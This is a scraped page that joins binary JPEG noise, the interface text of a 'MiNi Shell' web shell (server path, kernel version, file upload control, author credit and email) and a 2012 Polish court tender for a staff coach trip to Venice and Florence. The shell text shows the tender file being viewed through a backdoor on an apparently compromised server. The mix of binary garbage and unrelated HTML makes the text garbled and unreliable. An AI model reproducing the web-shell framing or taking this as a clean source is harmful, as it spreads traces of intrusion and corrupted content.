JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120322/90336-N-2012.html

<p class="kh_header"><b>Kłodzko: ZORGANIZOWANIE WYCIECZKI DO WENECJI i FLORENCJI  DLA PRACOWNIKÓW SĄDU REJONOWEGO W KŁODZKU.</b><br>
<b>Numer ogłoszenia: 90336 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Kłodzku , ul. Bohaterów Getta 15, 57-300 Kłodzko, woj. dolnośląskie, tel. 0-74 865-13-00, faks 0-74 865-13-00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http//www.klodzko.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE WYCIECZKI DO WENECJI i FLORENCJI  DLA PRACOWNIKÓW SĄDU REJONOWEGO W KŁODZKU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zorganizowanie wycieczki autokarowej dla pracowników Sadu Rejonowego w Kłodzku i innych osób uprawnionych, 46 osób w dniach od 01 maja 2012 r. do dnia 06 maja 2012 r. obejmującej następujące miejsca zwiedzania:
      1. Wenecja  ( 2 dni)
-  spacer  po  mieście;
-  rejs po wodach Laguny Weneckiej do historycznego centrum       Wenecji;
-  Piazzetta i Piazza di San Marco;
-  Pałac Dożów;
-  Bazylika św. Marka.;
-  Most Westchnień,;
-  Wieża Zegarowa;
-  Most  i  dzielnica  Rialto.;
-  Galeria  Akademii;
-  Kościół dei  Frari;
-  Kolekcja Peggy Guggenheim  
       2. Florencja ( 2 dni) :
-  Galeria Uffizi;
-  Palazzo Vecchio;
-  Muzeum Narodowe Bargello;
-  Galeria Akademii;
-  pałac Pizzich: Galeria Palatina, Komnaty królewskie;
-  ogrody Boboli . 
-  Katedra Santa Maria del Fiore;
- Bazylika  św. Krzyża z grobowcami najsłynniejszych florentyńczyków;
-  Plac  Signoria z  Fontanną Neptuna  
-  Most Złotników;
-  Panorama  miasta  z  Placu  Michała Anioła;
-  Baptysterium;
 
        3. Przejazd komfortowym autokarem.
        4. Plan-Program wycieczki:
01.05.2012 r. - wyjazd uczestników wycieczki do Wenecji i Florencji nastąpi z Kłodzka - parking przed centrum handlowym E. Leclerc ul.  Dusznicka 1a - w dniu 1 maja 2012 r. o godz. 16:00,  i przejazd do Wenecji, 
02.05.2012 r. -  całodzienne zwiedzanie miasta i nocleg, 
03.05.2012 r. -  dalsze zwiedzania miasta i wieczorny przejazd do hotelu w okolicach Florencji i nocleg, 
04.05.2012 r. -  całodzienne zwiedzanie miasta  i nocleg;
05.05.2012 r. -  całodzienne zwiedzanie miasta i wyjazd uczestników wycieczki  w godzinach wieczornych z Florencji,  i nocny  przejazd do Kłodzka. 
06.05.2012 r. - przyjazd do Kłodzka, parking przed centrum handlowym E. Leclerc ul.Dusznicka 1a;
5. 1 nocleg w okolicy Wenecji z 02.05.2012 r. na 03.05.2012 r. (w promieniu 50 km od miasta) wszystkich uczestników wraz z pilotem i kierowcami  w hotelu przynajmniej *** (pokoje 2 osobowe z łazienkami(wc, umywalka, prysznic)   wraz z posiłkami:
-  1 x obiadokolacja (zupa lub przystawka i  ciepłe drugie danie) wraz  z    
   napojami dla każdego z uczestników (co najmniej wodą  stołową ) w 
   ilości co najmniej 0,5 l na osobę ;
-  1 x śniadanie dla  uczestników(co najmniej kontynentalne wzmocnione),
   2 noclegi w okolicy Florencji z 03.05.2012 r. na 04.05.2012 r. oraz   04.05.2012 r. na 05.05.2012 r. (w promieniu 50 km od miasta) wszystkich uczestników wraz z pilotem i kierowcami  w hotelu przynajmniej *** (pokoje 2 osobowe z łazienkami (wc, umywalka, prysznic) wraz z posiłkami:
-  2 x obiadokolacja (zupa lub przystawka + ciepłe drugie danie) wraz  z   
   napojami dla każdego z uczestników (co najmniej wodą  stołową ) w 
   ilości co najmniej 0,5 l na osobę ;
-  2 x śniadanie dla  uczestników (co najmniej kontynentalne wzmocnione); 
- obiadokolację (zupa lub przystawka i  ciepłe drugie danie) wraz  z napojami dla każdego z uczestników (co najmniej wodą  stołową ) w ilości co najmniej 0,5 l na osobę we Florencji w dniu 05.05.2012  r. przed  wyjazdem do Kłodzka;
6. Opiekę licencjonowanego pilota podczas całej wycieczki; 
7. Opiekę przewodników w miejscach zwiedzania ( w przypadku miejscowych mówiących w języku polskim);
8.Bilety wstępów do zwiedzanych obiektów określonych w pkt 1;
9. W przypadku konieczności przejazdu środkami komunikacji miejskiej ( w tym tramwaje wodne) - cenę biletów na tę komunikację.
10. Wszelkie opłaty drogowe, opłaty za przejazdy drogami płatnymi, opłaty związane z wjazdami do miast  i parkowaniem, opłaty klimatyczne, inne opłaty związane z programem wycieczki, podatek VAT;
11. Ubezpieczenie NNW (10.000 PLN na osobę), KL (10.000 Euro na osobę), bagaż 800 zł  na osobę);.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Zamawiający wymaga, aby Wykonawca posiadał uprawnienia do prowadzenia określonej działalności i wykaże, że jest wpisany do Rejestru Organizatorów Turystyki i Pośredników Turystycznych zgodnie z właściwymi postanowieniami ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (tekst jedn. Dz. U. z 2004 r. Nr 223 poz. 2268 z późniejszymi zmianami)
Opis oceny: - Na podstawie dokumentu - uprawnienia (Zaświadczenia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał doświadczenie polegające na tym, że wykonał, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, trzy (3) usługi odpowiadające swoim rodzajem (organizacja wycieczek  zagranicznych)  i wartością przedmiotowemu zamówieniu  tj.:
-  nie mniejsze niż 70.000,00 zł  brutto każda.
-  nie krótsze niż 6 dni każda.
-  ilość uczestników nie mniejsza niż 46 osób każda. 
  Wykazane usługi powinny być wykonane należycie.
Opis oceny:- Na podstawie doświadczenia zawodowego, tj. wykazu usług oraz dokumentu potwierdzającego, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował komfortowym autokarem, nie starszym niż 8 letnim, wyposażonym w:
co najmniej 46 miejsc siedzących (oprócz miejsc dla 2 kierowców i pilota), 
      (razem co najmniej 49 miejsc siedzących),
 fotele rozsuwane na szerokość z regulowanym kątem oparcia i podłokietnikami,
 boczne drzwi wejściowe w przedziale pasażerskim otwierane przez kierowcę pneumatycznie lub  elektrycznie, zabezpieczone przed otwarciem w czasie jazdy,
 półki bagażowe podsufitowe,
 klimatyzację z indywidualnymi nawiewami,
 toaletę,
 barek,
 nagłośnienie autokaru, w tym mikrofon,
 co najmniej 2 zestawy sprzętu audio-wideo pozwalającego na odtwarzanie obrazu i dźwięku.
 wyposażony w pasy  bezpieczeństwa dla uczestników.

Opis oceny:- Na podstawie Wykazu dot. opisu autokaru.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował osobami  posiadającymi uprawnienia do prowadzenia określonej działalności:  
A).Pilotem wycieczki posiadającym odpowiednie kwalifikacje zgodnie z ustawą z dnia 29 sierpnia 1997 r. o usługach turystycznych (tekst jedn. Dz. U. z 2004 r. Nr 223 poz. 2268 z późniejszymi zmianami), posiadającym doświadczenie w zakresie pilotażu wycieczek do Włoch oraz znajomość języka polskiego i włoskiego w stopniu biegłym. 
Za osobę posiadającą doświadczenie w zakresie pilotażu wycieczek do Włoch, zamawiający uzna pilota, który brał udział w min. 3 takich wycieczkach. 
B).Co najmniej dwoma kierowcami posiadającymi prawo jazdy wymagane uprawnieniami do kierowania pojazdami przewidzianymi do realizacji zamówienia oraz minimum 2 letnią praktykę w prowadzeniu autokarów na trasach międzynarodowych spełniającymi wymagania określone w przepisach ustawy z 26.06.1997r. Prawo o ruchu drogowym (t.j. Dz. U. z 2005r Nr 108 poz.908)
Opis oceny:- Na podstawie Wykazu osób.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Przewiduje się możliwość dokonania w umowie następujących zmian: 
a) Zamawiający dopuszcza wprowadzenie zmian w sposobie wykonywania umowy, w tym zmiany sposobu spełnienia świadczenia, w przypadku gdy wystąpi, co najmniej jedna z poniższych sytuacji:
-  Pojawienia się nowszej metodologii/sposobu wykonania przedmiotu umowy,   
   pozwalającej na zaoszczędzenie czasu jej realizacji lub kosztów,
- Konieczności zrealizowania umowy przy zastosowaniu innych rozwiązań niż 
  wskazane w ofercie lub opisie przedmiotu zamówienia wskazanym w siwz w  
  sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem  
  lub wadliwym wykonaniem umowy,
- Konieczności zrealizowania umowy przy zastosowaniu innych rozwiązań ze       względu na zmiany obowiązującego prawa.
b) Zamawiający dopuszcza wprowadzenie zmian w przypadku:
- Wystąpienia siły wyższej, co uniemożliwia wykonanie przedmiotu umowy zgodnie z SIWZ,
      - Zmiany obowiązującej stawki VAT,
      - Rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy, przy 
        czym, w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie   
        pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione  
        świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku 
        z wynikającymi z Umowy planowanymi świadczeniami z zastrzeżeniem sytuacji  
        określonych w § 4 ust. 6 umowy;
c) Zamawiający zastrzega sobie możliwość wcześniejszego rozwiązania umowy w przypadku zmian formalno-prawnych niezależnych od zamawiającego oraz decyzji jednostek nadrzędnych resortu sprawiedliwości, na które Zamawiający nie ma wpływu.
2. Nie stanowią zmiany umowy w rozumieniu art. 144 ustawy pzp w szczególności:
- Zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy,
- Zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między   
  Stronami.
- Zmiany pozostałych postanowień umowy niestanowiące treści oferty Wykonawcy.
3. Wystąpienie którejkolwiek z wskazanych w ust. 1 i 2 okoliczności, nie stanowi obligatoryjnego zobowiązania Stron do wprowadzenia zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http//www.klodzko.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Kłodzku 57-300 Kłodzko ul. Bohaterów Getta 15, pok. 116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2012 godzina 10:00, miejsce: Sąd Rejonowy w Kłodzku 57-300 Kłodzko ul. Bohaterów Getta 15, pok. 205.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com